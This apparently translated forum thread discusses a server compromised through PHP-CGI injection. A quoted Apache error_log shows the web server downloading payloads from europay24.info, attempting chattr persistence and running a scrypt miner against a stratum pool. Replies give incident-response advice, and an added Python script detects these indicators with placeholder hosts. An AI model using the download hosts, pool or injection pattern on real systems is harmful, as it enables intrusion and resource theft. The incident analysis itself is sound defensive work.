[Fri Nov 22 00:44:29 2013] [error] [client 50.116.50.35] chattr: Permission denied while reading flags on orbit-gdm\r
[Fri Nov 22 00:44:29 2013] [error] [client 50.116.50.35] chattr: Permission denied while reading flags on orbit-root\r
[Fri Nov 22 00:44:29 2013] [error] [client 50.116.50.35] chattr: Permission denied while reading flags on pulse-PKdhtXMmr18n\r
[Fri Nov 22 00:44:29 2013] [error] [client 50.116.50.35] chattr: Permission denied while reading flags on pulse-uZEcfmJ73JvE\r
[Fri Nov 22 00:44:29 2013] [error] [client 50.116.50.35] chattr: Permission denied while reading flags on ssh-NQaeNL1573\r
[Fri Nov 22 00:44:29 2013] [error] [client 50.116.50.35] chattr: Permission denied while reading flags on virtual-andry.NAYr4U\r
[Fri Nov 22 00:44:29 2013] [error] [client 50.116.50.35] --2013-11-22 00:44:29-- europay24.info/clamav
[Fri Nov 22 00:44:29 2013] [error] [client 50.116.50.35] Resolving europay24.info… 85.17.180.61
[Fri Nov 22 00:44:29 2013] [error] [client 50.116.50.35] Connecting to europay24.info|85.17.180.61|:80… connected.
[Fri Nov 22 00:44:30 2013] [error] [client 50.116.50.35] HTTP request sent, awaiting response… 200 OK
[Fri Nov 22 00:44:30 2013] [error] [client 50.116.50.35] Length: 379680 (371K) [text/plain]
[Fri Nov 22 00:44:30 2013] [error] [client 50.116.50.35] Saving to: `clamav'
[Fri Nov 22 00:44:30 2013] [error] [client 50.116.50.35]
[Fri Nov 22 00:44:30 2013] [error] [client 50.116.50.35] 0K .......... .......... .......... .......... .......... 13% 337K 1s
[Fri Nov 22 00:44:30 2013] [error] [client 50.116.50.35] 50K .......... .......... .......... .......... .......... 26% 1012K 1s
[Fri Nov 22 00:44:30 2013] [error] [client 50.116.50.35] 100K .......... .......... .......... .......... .......... 40% 845K 0s
[Fri Nov 22 00:44:30 2013] [error] [client 50.116.50.35] 150K .......... .......... .......... .......... .......... 53% 738K 0s
[Fri Nov 22 00:44:30 2013] [error] [client 50.116.50.35] 200K .......... .......... .......... .......... .......... 67% 878K 0s
[Fri Nov 22 00:44:30 2013] [error] [client 50.116.50.35] 250K .......... .......... .......... .......... .......... 80% 644K 0s
[Fri Nov 22 00:44:31 2013] [error] [client 50.116.50.35] 300K .......... .......... .......... .......... .......... 94% 122K 0s
[Fri Nov 22 00:44:31 2013] [error] [client 50.116.50.35] 350K .......... .......... 100% 11.3M=0.9s
[Fri Nov 22 00:44:31 2013] [error] [client 50.116.50.35]
[Fri Nov 22 00:44:31 2013] [error] [client 50.116.50.35] 2013-11-22 00:44:31 (425 KB/s) - `clamav' saved [379680/379680]
[Fri Nov 22 00:44:31 2013] [error] [client 50.116.50.35]
[Fri Nov 22 00:44:31 2013] [error] [client 50.116.50.35] --2013-11-22 00:44:31-- europay24.info/sh
[Fri Nov 22 00:44:31 2013] [error] [client 50.116.50.35] Resolving europay24.info… 85.17.180.61
[Fri Nov 22 00:44:31 2013] [error] [client 50.116.50.35] Connecting to europay24.info|85.17.180.61|:80… connected.
[Fri Nov 22 00:44:31 2013] [error] [client 50.116.50.35] HTTP request sent, awaiting response… 200 OK
[Fri Nov 22 00:44:31 2013] [error] [client 50.116.50.35] Length: 518288 (506K) [text/plain]
[Fri Nov 22 00:44:31 2013] [error] [client 50.116.50.35] Saving to: `sh'
[Fri Nov 22 00:44:31 2013] [error] [client 50.116.50.35]
[Fri Nov 22 00:44:32 2013] [error] [client 50.116.50.35] 0K .......... .......... .......... .......... .......... 9% 48.1K 9s
[Fri Nov 22 00:44:32 2013] [error] [client 50.116.50.35] 50K .......... .......... .......... .......... .......... 19% 933K 4s
[Fri Nov 22 00:44:33 2013] [error] [client 50.116.50.35] 100K .......... .......... .......... .......... .......... 29% 64.1K 4s
[Fri Nov 22 00:44:34 2013] [error] [client 50.116.50.35] 150K .......... .......... .......... .......... .......... 39% 125K 3s
[Fri Nov 22 00:44:34 2013] [error] [client 50.116.50.35] 200K .......... .......... .......... .......... .......... 49% 385K 2s
[Fri Nov 22 00:44:34 2013] [error] [client 50.116.50.35] 250K .......... .......... .......... .......... .......... 59% 177K 2s
[Fri Nov 22 00:44:34 2013] [error] [client 50.116.50.35] 300K .......... .......... .......... .......... .......... 69% 182K 1s
[Fri Nov 22 00:44:35 2013] [error] [client 50.116.50.35] 350K .......... .......... .......... .......... .......... 79% 180K 1s
[Fri Nov 22 00:44:35 2013] [error] [client 50.116.50.35] 400K .......... .......... .......... .......... .......... 88% 101K 0s
[Fri Nov 22 00:44:35 2013] [error] [client 50.116.50.35] 450K .......... .......... .......... .......... .......... 98% 846K 0s
[Fri Nov 22 00:44:35 2013] [error] [client 50.116.50.35] 500K ...... 100% 1.14M=3.8s
[Fri Nov 22 00:44:35 2013] [error] [client 50.116.50.35]
[Fri Nov 22 00:44:35 2013] [error] [client 50.116.50.35] 2013-11-22 00:44:35 (133 KB/s) - `sh' saved [518288/518288]
[Fri Nov 22 00:44:35 2013] [error] [client 50.116.50.35]
[Fri Nov 22 00:44:35 2013] [error] [client 50.116.50.35] kill: 22: Usage: kill [-s sigspec | -signum | -sigspec] [pid | job]… or
[Fri Nov 22 00:44:35 2013] [error] [client 50.116.50.35] kill -l [exitstatus]
[Fri Nov 22 00:44:35 2013] [error] [client 50.116.50.35] [2013-11-22 00:44:35] Starting Stratum on stratum+tcp://216.230.103.42:3333
[Fri Nov 22 00:44:35 2013] [error] [client 50.116.50.35] [2013-11-22 00:44:35] 4 miner threads started, using ‘scrypt’ algorithm.
[Fri Nov 22 00:44:35 2013] [error] [client 50.116.50.35] [2013-11-22 00:44:35] Binding thread 3 to cpu 3
[Fri Nov 22 00:44:35 2013] [error] [client 50.116.50.35] [2013-11-22 00:44:35] Binding thread 0 to cpu 0
[Fri Nov 22 00:44:35 2013] [error] [client 50.116.50.35] ./sh: 1: \x7fELF\x02\x01\x01\x02: not found
[Fri Nov 22 00:44:35 2013] [error] [client 50.116.50.35] ./sh: 2: Syntax error: “(” unexpected
[Fri Nov 22 00:44:35 2013] [error] [client 50.116.50.35] [2013-11-22 00:44:35] Binding thread 2 to cpu 2
[Fri Nov 22 00:44:35 2013] [error] [client 50.116.50.35] chattr: Operation not permitted while setting flags on bash\r
[Fri Nov 22 00:44:35 2013] [error] [client 50.116.50.35] chattr: Operation not permitted while setting flags on sh\r
[Fri Nov 22 00:44:35 2013] [error] [client 50.116.50.35] [2013-11-22 00:44:35] Binding thread 1 to cpu 1
[Fri Nov 22 00:44:37 2013] [error] [client 50.116.50.35] [2013-11-22 00:44:37] Stratum detected new block
[Fri Nov 22 00:44:38 2013] [error] [client 50.116.50.35] [2013-11-22 00:44:38] thread 3: 4096 hashes, 3.75 khash/s
[Fri Nov 22 00:44:39 2013] [error] [client 50.116.50.35] [2013-11-22 00:44:39] thread 0: 4096 hashes, 3.19 khash/s
[Fri Nov 22 00:44:40 2013] [error] [client 50.116.50.35] [2013-11-22 00:44:40] thread 2: 4096 hashes, 3.31 khash/s
[Fri Nov 22 00:44:40 2013] [error] [client 50.116.50.35] [2013-11-22 00:44:40] thread 1: 4096 hashes, 1.46 khash/s
[Fri Nov 22 00:45:26 2013] [error] [client 50.116.50.35] [2013-11-22 00:45:26] thread 1: 87412 hashes, 1.92 khash/s
[Fri Nov 22 00:46:22 2013] [error] [client 50.116.50.35] [2013-11-22 00:46:22] thread 1: 115424 hashes, 2.04 khash/s
[Fri Nov 22 00:46:24 2013] [error] [client 50.116.50.35] [2013-11-22 00:46:24] thread 0: 191392 hashes, 1.82 khash/s
[Fri Nov 22 00:46:34 2013] [error] [client 50.116.50.35] [2013-11-22 00:46:34] thread 2: 198628 hashes, 1.74 khash/s
[Fri Nov 22 00:46:34 2013] [error] [client 50.116.50.35] [2013-11-22 00:46:34] thread 3: 224940 hashes, 1.94 khash/s
[Fri Nov 22 00:47:23 2013] [error] [client 50.116.50.35] [2013-11-22 00:47:23] thread 1: 122500 hashes, 2.02 khash/s
[Fri Nov 22 00:47:23 2013] [error] [client 50.116.50.35] [2013-11-22 00:47:23] thread 0: 109444 hashes, 1.83 khash/s
[Fri Nov 22 00:47:32 2013] [error] [client 50.116.50.35] [2013-11-22 00:47:32] thread 3: 116544 hashes, 2.01 khash/s
[Fri Nov 22 00:47:36 2013] [error] [client 50.116.50.35] [2013-11-22 00:47:36] thread 2: 104572 hashes, 1.67 khash/s
[Fri Nov 22 00:48:24 2013] [error] [client 50.116.50.35] [2013-11-22 00:48:24] thread 1: 121104 hashes, 1.99 khash/s
[Fri Nov 22 00:48:24 2013] [error] [client 50.116.50.35] [2013-11-22 00:48:24] thread 0: 109620 hashes, 1.81 khash/s
[Fri Nov 22 00:48:31 2013] [error] [client 50.116.50.35] [2013-11-22 00:48:31] thread 3: 120544 hashes, 2.06 khash/s
[Fri Nov 22 00:48:38 2013] [error] [client 50.116.50.35] [2013-11-22 00:48:38] thread 2: 100212 hashes, 1.61 khash/s
[Fri Nov 22 00:48:51 2013] [error] [client 94.102.56.237] File does not exist: /var/www/cgi-php5
[Fri Nov 22 00:49:20 2013] [error] [client 50.116.50.35] [2013-11-22 00:49:20] thread 1: 119460 hashes, 2.13 khash/s
[Fri Nov 22 00:49:23 2013] [error] [client 50.116.50.35] [2013-11-22 00:49:23] thread 0: 108540 hashes, 1.84 khash/s
[Fri Nov 22 00:49:26 2013] [warn] [client 50.116.50.35] Timeout waiting for output from CGI script /usr/lib/cgi-bin/php
[Fri Nov 22 00:49:26 2013] [error] [client 50.116.50.35] Script timed out before returning headers: php
[Fri Nov 22 00:49:35 2013] [error] [client 50.116.50.35] [2013-11-22 00:49:35] thread 3: 123396 hashes, 1.93 khash/s
[Fri Nov 22 00:49:35 2013] [error] [client 50.116.50.35] [2013-11-22 00:49:35] thread 2: 96888 hashes, 1.71 khash/s
[Fri Nov 22 00:50:19 2013] [error] [client 50.116.50.35] [2013-11-22 00:50:19] thread 1: 127748 hashes, 2.16 khash/s
[Fri Nov 22 00:50:20 2013] [error] [client 50.116.50.35] [2013-11-22 00:50:20] thread 0: 110688 hashes, 1.94 khash/s
[Fri Nov 22 00:50:38 2013] [error] [client 50.116.50.35] [2013-11-22 00:50:38] thread 3: 115972 hashes, 1.83 khash/s
[Fri Nov 22 00:50:40 2013] [error] [client 50.116.50.35] [2013-11-22 00:50:40] thread 2: 102696 hashes, 1.59 khash/s
[Fri Nov 22 00:50:45 2013] [error] [client 50.116.50.35] [2013-11-22 00:50:45] Stratum detected new block

[Fri Nov 22 01:21:11 2013] [error] [client 50.116.50.35] [2013-11-22 01:21:11] thread 1: 118740 hashes, 2.16 khash/s
[Fri Nov 22 01:21:22 2013] [error] [client 50.116.50.35] [2013-11-22 01:21:22] thread 0: 111680 hashes, 1.67 khash/s
[Fri Nov 22 01:21:22 2013] [error] [client 50.116.50.35] [2013-11-22 01:21:22] thread 3: 119164 hashes, 1.95 khash/s
[Fri Nov 22 01:21:23 2013] [error] [client 50.116.50.35] [2013-11-22 01:21:23] thread 2: 104004 hashes, 1.76 khash/s
[/quote]

To complement my fellow members' answers, the simplest thing is to make a disk image of your server, reinstall everything fully up to date, and secure it properly before putting it back into production (you do have backups of your data, don't you?)

Then you use the image you made, in a well-isolated virtual machine, to do a post-mortem analysis of what happened.

Well, apparently he was able to load and run a server, but it seems he didn't manage to get root rights. So you can search for all the files owned by www-data and check them.
The attack is a CGI injection. See
security.stackexchange.com/quest … hp-attacks
for example

The main thing to do is to debug your website, which has holes in it.

CGI injection is mostly a misconfiguration of the server itself, I think.
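The log quoted above shows what the replies point at: everything the PHP-CGI process writes to stderr (wget transfers, cp and chattr failures, miner output) ends up in Apache's error_log next to the web server's own messages. As an added example, not code from the thread, this Python script parses Apache 2.2 error_log lines, tags the indicator classes visible in that log, and groups them per client IP so a defender can separate clients that only probed the CGI binary from those whose requests actually ran commands; the sample log, IPs and hostnames are constructed placeholders.

```python
"""Triage Apache 2.2 error_log entries for the PHP-CGI compromise pattern
in this thread. Added example: the sample log below is constructed, with
placeholder IPs and hostnames, and is not taken from the original post."""
import re
from collections import Counter, defaultdict

# Apache 2.2 layout: "[date] [level] [client ip] message"; the client
# part is absent on server notices such as "resuming normal operations".
LINE_RE = re.compile(
    r"^\[(?P<ts>[^\]]+)\] \[(?P<level>\w+)\] "
    r"(?:\[client (?P<client>[^\]]+)\] )?(?P<msg>.*)$"
)
# wget announces each fetch as "--YYYY-MM-DD HH:MM:SS--  URL".
WGET_RE = re.compile(r"^--\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}--\s+(\S+)")

# Whatever the PHP-CGI process writes to stderr lands in error_log, so a
# request that reaches a shell leaves wget, cp, chattr and miner output
# there. Each label names one indicator class visible in the quoted log.
INDICATORS = (
    ("cgi_direct_access", re.compile(r"The PHP CGI cannot be accessed directly")),
    ("remote_include", re.compile(r"Failed opening required 'https?://")),
    ("download_by_webserver", WGET_RE),
    ("persistence_attempt", re.compile(r"cron\.hourly|crontab|^chattr: ")),
    ("miner_output", re.compile(r"Starting Stratum|miner threads started|khash/s")),
    ("cgi_abnormal_exit", re.compile(r"Premature end of script headers|Script timed out")),
)
# Labels proving commands actually ran, as opposed to a probe that the
# force-cgi-redirect guard rejected with "cannot be accessed directly".
EXECUTION_LABELS = {"remote_include", "download_by_webserver",
                    "persistence_attempt", "miner_output"}

def parse_line(line):
    """Split one error_log line into fields, or return None when it is not
    an entry (blank lines, progress bars wrapped by the forum software)."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None

def classify(msg):
    """Return every indicator label whose pattern matches the message."""
    return [label for label, rx in INDICATORS if rx.search(msg)]

def triage(lines):
    """Count indicator hits per client IP and collect the URLs the web
    server was made to download. Returns (hits, urls)."""
    hits = defaultdict(Counter)
    urls = defaultdict(list)
    for line in lines:
        entry = parse_line(line)
        if entry is None or entry["client"] is None:
            continue
        client, msg = entry["client"], entry["msg"]
        for label in classify(msg):
            hits[client][label] += 1
        m = WGET_RE.match(msg)
        if m and m.group(1) not in urls[client]:
            urls[client].append(m.group(1))
    return dict(hits), dict(urls)

def compromise_evidence(hits):
    """Clients whose entries show code execution, sorted by address."""
    return sorted(c for c, counts in hits.items() if EXECUTION_LABELS & set(counts))

# Constructed sample modelled on the entries quoted in the thread.
SAMPLE_LOG = """\
[Sun Nov 17 07:48:18 2013] [notice] Apache/2.2.14 (Ubuntu) configured -- resuming normal operations
[Tue Nov 19 00:46:58 2013] [error] [client 198.51.100.7] <b>Security Alert!</b> The PHP CGI cannot be accessed directly.
[Tue Nov 19 00:46:58 2013] [error] [client 198.51.100.7] Premature end of script headers: php
[Thu Nov 21 17:33:52 2013] [error] [client 192.0.2.44] PHP Fatal error: Unknown: Failed opening required 'http://shells.example/wso.txt' (include_path='.:/usr/share/php') in Unknown on line 0
[Fri Nov 22 00:44:26 2013] [error] [client 203.0.113.5] --2013-11-22 00:44:26--  http://dropper.example/c
[Fri Nov 22 00:44:26 2013] [error] [client 203.0.113.5] Saving to: `c'
[Fri Nov 22 00:44:29 2013] [error] [client 203.0.113.5] cp: cannot create regular file `/etc/cron.hourly/update': Permission denied
[Fri Nov 22 00:44:29 2013] [error] [client 203.0.113.5] chattr: Permission denied while reading flags on keyring-abc123\\r
[Fri Nov 22 00:44:35 2013] [error] [client 203.0.113.5] [2013-11-22 00:44:35] Starting Stratum on stratum+tcp://192.0.2.99:3333
[Fri Nov 22 00:44:38 2013] [error] [client 203.0.113.5] [2013-11-22 00:44:38] thread 3: 4096 hashes, 3.75 khash/s
[Fri Nov 22 00:49:26 2013] [error] [client 203.0.113.5] Script timed out before returning headers: php
"""

if __name__ == "__main__":
    hits, urls = triage(SAMPLE_LOG.splitlines())
    for client in compromise_evidence(hits):
        print(client, dict(hits[client]), urls.get(client, []))
```

Run against a real error_log by replacing SAMPLE_LOG with the file's lines; clients that show up only under cgi_direct_access were stopped by the CGI guard, while any client under the execution labels had commands run as the web server user.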